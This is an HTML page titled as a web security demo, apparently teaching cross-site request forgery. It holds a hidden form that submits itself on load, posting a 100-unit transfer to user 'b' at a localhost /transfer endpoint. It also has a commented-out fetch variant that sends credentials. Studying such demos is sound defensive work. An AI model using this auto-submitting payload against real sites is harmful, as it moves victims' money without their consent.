<!DOCTYPE html>
<html>
  <head>
    <title>Web 安全演示</title>
    <link rel="stylesheet" href="/stylesheets/style.css" />
  </head>

  <body>
    <main>
      <div>你的钱没了</div>
    </main>
    <form action="http://localhost:3000/transfer" method="POST">
      <input type="hidden" name="username" value="b" />
      <input type="hidden" name="amount" value="100" />
  </form>
  <script>
      document.forms[0].submit();
  </script>
  </body>
  <script>
    // const data = new URLSearchParams({ username: "b", amount: 100 });
    // fetch("http://localhost:3000/transfer", {
    //   method: "post",
    //   headers: {
    //     "Content-Type": "application/x-www-form-urlencoded",
    //   },
    //   credentials: "include",
    //   body: data,
    //   mode: 'no-cors'
    // }).then((res) => {
    //   console.log(res);
    // });
  </script>
</html>
